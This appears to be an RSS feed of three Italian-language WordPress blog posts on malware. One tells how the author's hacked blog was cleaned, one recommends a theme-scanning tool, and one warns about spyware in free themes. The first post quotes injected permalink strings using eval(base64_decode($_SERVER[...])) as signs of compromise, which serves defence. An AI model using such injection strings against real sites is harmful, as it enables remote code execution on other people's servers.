<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Wordpress tutorial, news, plugin and themes reviews &#187; Malware</title>
	<atom:link href="http://www.workpress.net/tag/malware/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.workpress.net</link>
	<description>Wordpress tutorial, news, plugin and themes reviews</description>
	<lastBuildDate>Fri, 10 Jun 2011 19:03:43 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>How to clean an hacked wordpress blog</title>
		<link>http://www.workpress.net/how-to-clean-an-hacked-wordpress-blog/</link>
		<comments>http://www.workpress.net/how-to-clean-an-hacked-wordpress-blog/#comments</comments>
		<pubDate>Sun, 06 Sep 2009 09:54:31 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Wordpress News]]></category>
		<category><![CDATA[Wordpress Tips]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[hacked]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Spyware]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[upgrade]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://www.workpress.net/blog/?p=523</guid>
		<description><![CDATA[
Dopo aver trascorso qualche giorno di vacanza, sono rientrato a casa, ed accendendo il computer dopo un breve periodo di inutilizzo, mi accorgo di un&#8217;amara sorpresa proprio in questo blog.
Workpress.net è stato colpito da un attacco hacker!
La colpa è sicuramente del mancato aggiornamento all&#8217;ultima versione del nostro amato Cms, prima di partire per le vacanze, lasciando quindi il blog vulnerabile ad attacchi esterni. Proprio pochi giorni fà era circolata la notizia delle falle di sicurezza nelle ultime versioni di WordPress, prontamente corrette con la versione 2.8.4 del Cms.
Symptoms of an ...<p><a href="http://www.workpress.net/how-to-clean-an-hacked-wordpress-blog/">How to clean an hacked wordpress blog</a> is a post from: <a href="http://www.workpress.net">Wordpress tutorial, news, plugin and themes reviews</a></p>
]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.workpress.net/blog/wp-content/uploads/2009/09/wordpress-hacked-blog1.jpg"><img class="alignnone size-large wp-image-524" title="wordpress-hacked-blog" src="http://www.workpress.net/blog/wp-content/uploads/2009/09/wordpress-hacked-blog-375x500.jpg" alt="wordpress-hacked-blog" width="375" height="500" /></a></p>
<p>Dopo aver trascorso qualche giorno di vacanza, sono rientrato a casa, ed accendendo il computer dopo un breve periodo di inutilizzo, mi accorgo di un&#8217;amara sorpresa proprio in questo blog.</p>
<p><strong>Workpress.net è stato colpito da un attacco hacker</strong>!</p>
<p>La colpa è sicuramente del <a href="http://www.workpress.net/blog/wordpress-news/rilasciata-lultima-versione-di-wordpress-271/">mancato aggiornamento all&#8217;ultima versione del nostro amato Cms</a>, prima di partire per le vacanze, lasciando quindi il <strong>blog vulnerabile ad attacchi esterni</strong>. Proprio pochi giorni fà era circolata la notizia delle <strong>falle di sicurezza</strong> nelle ultime versioni di WordPress, prontamente <strong>corrette con la versione 2.8.4</strong> del Cms.</p>
<h3>Symptoms of an hacked blog</h3>
<p>Mi sono accorto di essere stato attaccato, dalle statistiche del blog che vedevano una drastica riduzione delle pageviews. Controllando direttamente sul blog mi sono accorto che ogni link presente nelle pagine del blog puntava ad un <strong>redirect esterno</strong>, in particolare ai link presenti nel blog venivano inserita questa stringa:</p>
<p>%&amp;(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&amp;%/#comment-506929</p>
<p>Ovvero la <a title="Indicizzare il blog grazie alla struttura dei permalinks" href="http://www.workpress.net/blog/wordpress-tips/come-mostrare-i-feed-per-categoria-e-rendere-il-blog-indicizzabile/">struttura dei permalinks</a> del mio blog veniva modificata con l&#8217;aggiunta dell stringa qui sopra.</p>
<p><strong>Altri esempi di redirect:</strong></p>
<ul>
<li>%&amp;({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&amp;%/</li>
<li>“/%&amp;(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&amp;%</li>
</ul>
<h3>How can I clean my hacked blog?</h3>
<p>Dopo una rapida ricerca sul forum di WordPress e su Google, mi sono messo all&#8217;opera per <strong>eliminare potenziali infezioni</strong> dal mio blog.</p>
<p>Ecco un breve elenco delle operazioni da eseguire:</p>
<ol>
<li>Ho cancellato dal pannello di amministrazione un utente estraneo che aveva permessi da amministratore, creato ad hoc dall&#8217;attacco hacker, agendo direttamente dal pannello di phpMyAdmin (qualora non dovesse funzionare il comando delete dal pannello di controllo di WordPress)</li>
<li>Ho cancellato completamente i file di wordpress (escluso il file wp-config e la cartella wp-content)</li>
<li>Ho <strong>scaricato l&#8217;ultima versione di WordPress</strong>, la 2.8.4. e l&#8217;ho caricata con Ftp sul server.</li>
<li>Ho eseguito l&#8217;accesso al blog ed <strong>aggiornato le tabelle del database</strong> come da procedura guidata indicata dalla nuova installazione.</li>
<li>Ho<strong> cancellato e ricaricato il tema del blog</strong> sul server.</li>
<li>Ho <strong>cancellato e ricaricato tutti i plugin installati</strong> sul blog.</li>
<li>Ed infine ho <strong>cambiato la password</strong> di amministrazione del blog.</li>
</ol>
<h3>How to control if my blog was cleaned?</h3>
<p>Cercando con Google casi analoghi ho trovato il <strong>blog di Donncha</strong>, sviluppatore irlandese di WordPress, che metteva a disposizione un utile <strong>plugin per controllare lo stato di salute del vostro blog</strong>. Basta scaricarlo, installarlo ed attivarlo dal vostro pannello di controllo e potrete vedere se il vostro blog è stato ripulito per bene da codice malware.</p>
<p>Ecco il link per scaricare il plugin <strong>Exploit-scanner</strong> di Donncha. <a href="http://ocaoimh.ie/exploit-scanner/" target="_blank">Scarica plugin</a></p>
<p>In conclusione voglio suggerire a tutti di impiegare un pò del proprio tempo per aggiornare prontamente la propria versione di wordpress installata nel proprio server, per <a title="Eliminare malware e virus dai temi gratuiti per il nostro blog wordpress" href="http://www.workpress.net/blog/wordpress-theme/free-themes-per-wordpress-attento-agli-spyware/">evitare di venir attaccati e rischiare di perdere il proprio prezioso lavoro</a>.</p>
<p>Prevenire è meglio che curare!</p>
<p><a href="http://www.workpress.net/how-to-clean-an-hacked-wordpress-blog/">How to clean an hacked wordpress blog</a> is a post from: <a href="http://www.workpress.net">WordPress tutorial, news, plugin and themes reviews</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.workpress.net/how-to-clean-an-hacked-wordpress-blog/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Come controllare se il theme del tuo blog è infetto</title>
		<link>http://www.workpress.net/come-controllare-se-il-theme-del-tuo-blog-e-infetto/</link>
		<comments>http://www.workpress.net/come-controllare-se-il-theme-del-tuo-blog-e-infetto/#comments</comments>
		<pubDate>Mon, 27 Apr 2009 15:14:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Wordpress Theme]]></category>
		<category><![CDATA[Wordpress Tips]]></category>
		<category><![CDATA[hidden links]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Spyware]]></category>
		<category><![CDATA[theme infected]]></category>
		<category><![CDATA[Tools]]></category>

		<guid isPermaLink="false">http://www.workpress.net/blog/?p=267</guid>
		<description><![CDATA[
Vi avevo anticipato di quanto possa essere &#8220;pericoloso&#8221; scaricare un theme gratuito per il vostro blog, con le minacce di installare sul nostro server, virus, spyware e link indesiderati.
Dopo aver fatto una sorta di tutorial per scoprire &#8220;manualmente&#8221; se il nostro nuovo template era infetto da malware vari, oggi vi propongo un ottimo strumento online, sviluppato da un italiano (come me) che permette di sottoporre ad un&#8217;accurata analisi il theme installato sul vostro blog, per capire quali rischi si corrono e se è necessario pensare ad un&#8217;alternativa grafica per esporre ...<p><a href="http://www.workpress.net/come-controllare-se-il-theme-del-tuo-blog-e-infetto/">Come controllare se il theme del tuo blog è infetto</a> is a post from: <a href="http://www.workpress.net">Wordpress tutorial, news, plugin and themes reviews</a></p>
]]></description>
			<content:encoded><![CDATA[<p><a rel="lightbox" href="http://www.workpress.net/blog/wp-content/uploads/2009/04/automator_icon1.png"><img class="alignnone size-medium wp-image-268" title="automator_icon" src="http://www.workpress.net/blog/wp-content/uploads/2009/04/automator_icon-300x300.png" alt="automator_icon" width="300" height="300" /></a></p>
<p>Vi avevo anticipato di <a href="http://www.workpress.net/blog/wordpress-theme/free-themes-per-wordpress-attento-agli-spyware/">quanto possa essere &#8220;pericoloso&#8221; scaricare un theme gratuito per il vostro blog</a>, con le minacce di installare sul nostro server, <strong>virus</strong>, <strong>spyware</strong> e link indesiderati.</p>
<p>Dopo aver fatto una sorta di <a href="http://www.workpress.net/blog/wordpress-theme/free-themes-per-wordpress-attento-agli-spyware/">tutorial per scoprire &#8220;manualmente&#8221; se il nostro nuovo template era infetto da malware vari</a>, oggi vi propongo un ottimo <strong>strumento online</strong>, sviluppato da un italiano (come me) che permette di sottoporre ad un&#8217;<a href="http://www.workpress.net/blog/wordpress-theme/come-caricare-un-nuovo-theme-per-wordpress/">accurata analisi il theme installato sul vostro blog</a>, per capire quali <strong>rischi</strong> si corrono e se è necessario pensare ad un&#8217;alternativa grafica per esporre i contenuti del nostro blog.</p>
<p>Il <strong>tool online</strong> per <strong>testare il vostro theme</strong> è stato sviluppato da Mario Pascucci e lo potete trovare a questo Url:</p>
<p><a href="http://www.ismprofessional.net/pascucci/wp-test.php">http://www.ismprofessional.net/pascucci/wp-test.php</a></p>
<p>Sperando che possa esservi utile!</p>
<p>Fortunatamente i <strong>themes</strong> su cui girano i miei blog non hanno riscontrato <strong>malware</strong> e minacce varie, vale la pena <strong>testare il proprio blog</strong> visto che l&#8217;ottimo servizio offerto da Mario, è free!</p>
<p><a href="http://www.workpress.net/come-controllare-se-il-theme-del-tuo-blog-e-infetto/">Come controllare se il theme del tuo blog è infetto</a> is a post from: <a href="http://www.workpress.net">WordPress tutorial, news, plugin and themes reviews</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.workpress.net/come-controllare-se-il-theme-del-tuo-blog-e-infetto/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Free themes per WordPress, attento agli spyware</title>
		<link>http://www.workpress.net/free-themes-per-wordpress-attento-agli-spyware/</link>
		<comments>http://www.workpress.net/free-themes-per-wordpress-attento-agli-spyware/#comments</comments>
		<pubDate>Wed, 08 Apr 2009 17:30:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Wordpress News]]></category>
		<category><![CDATA[Wordpress Theme]]></category>
		<category><![CDATA[Wordpress Tips]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[Free Themes]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Spyware]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://www.workpress.net/blog/?p=234</guid>
		<description><![CDATA[Ultimamente sono sempre di più gli sviluppatori che permettono ai propri visitatori di scaricare le proprie crezioni, intese come themes per WordPress.
Penso che questa sia una ottima cosa, anzi vi annuncio che a breve anche noi rilasceremo i nostri primi template gratuiti da scaricare. Avere molti sviluppatori di templates per blog che sfruttano la potenza di WordPress, si traduce in una maggiore varietà di scelta ed unicità per la scelta grafica dei nostri blog.
Tuttavia ci sono alcuni grafici che approfittano, della grande richiesta di themes gratuiti dedicati a WordPress, per ...<p><a href="http://www.workpress.net/free-themes-per-wordpress-attento-agli-spyware/">Free themes per WordPress, attento agli spyware</a> is a post from: <a href="http://www.workpress.net">Wordpress tutorial, news, plugin and themes reviews</a></p>
]]></description>
			<content:encoded><![CDATA[<p><img class="alignright size-full wp-image-236" title="free-themes-wordpress" src="http://www.workpress.net/blog/wp-content/uploads/2009/04/free-themes-wordpress1.jpg" alt="free-themes-wordpress" width="210" height="447" />Ultimamente sono sempre di più gli sviluppatori che permettono ai propri visitatori di scaricare le proprie crezioni, intese come <strong>themes</strong> per WordPress.<br />
Penso che questa sia una ottima cosa, anzi vi annuncio che a breve anche noi rilasceremo i nostri primi <strong>template gratuiti</strong> da scaricare. Avere molti sviluppatori di templates per blog che sfruttano la potenza di <strong>WordPress</strong>, si traduce in una maggiore varietà di scelta ed unicità per la scelta grafica dei nostri blog.</p>
<p>Tuttavia ci sono alcuni grafici che approfittano, della grande richiesta di <strong>themes gratuiti</strong> dedicati a WordPress, per contaminare tali themes. In particolare inserendo <strong>link nel codice</strong> del templates, invisibile ad occhio nudo dopo essere stato installato. Ma i <strong>rischi</strong> che si corrono scaricando un theme gratuito possono essere anche più gravi come in casi denunciati in cui gli <strong>spyware</strong> veicolavano virus ed andavano a scrivere sul databse del nostro blog. Oppure in alcuni casi si è riscontrato un <strong>redirect</strong> per i click di AdSense che venivano conteggiati su account esterni.</p>
<p>Vediamo alcuni <strong>esempi e trucchetti</strong> per scoprire se il nostro theme è <strong>contaminato</strong> da spyware o link non desiderati.</p>
<ol>
<li>Inanzitutto prendete l&#8217;abitudine di scaricare themes da siti considerati sicuri, quindi direttamente dai siti degli autori o nel migliore dei casi dal <a href="http://wordpress.org/extend/themes/">repository ufficiale</a> dei themes di WordPress.</li>
<li>Controllate il codice del vostro theme contenuto nei file header.php o footer.php ed i file con nomi simili tipo: header-txt.php in modo da individuare codice malevolo od estraneo al nostro blog.</li>
<li>Assicuratevi che non ci siano link esterni (esclusi quelli dei credits dell&#8217;autore) inseriti in div con attributi hidden, quindi non visibili una volta pubblicati, ma tuttavia funzionanti.</li>
<li>Controllate che nei file del nostro theme, non ci siano link a siti discutibili, come casinò, medicinali, pornografici etc&#8230;</li>
</ol>
<p>Se proprio non volete correre rischi, ed essere sicuri al 100% dell&#8217;integrità del theme per il vostro blog, vi consiglio di spendere qualche dollaro per acquistare un <strong>premium theme</strong> per WordPress, che garantirà al vostro blog tutta la sicurezza di un lavoro bene eseguito ed una grafica esclusiva e personalizzata per i vostri contenuti.</p>
<p><a href="http://www.workpress.net/free-themes-per-wordpress-attento-agli-spyware/">Free themes per WordPress, attento agli spyware</a> is a post from: <a href="http://www.workpress.net">WordPress tutorial, news, plugin and themes reviews</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.workpress.net/free-themes-per-wordpress-attento-agli-spyware/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

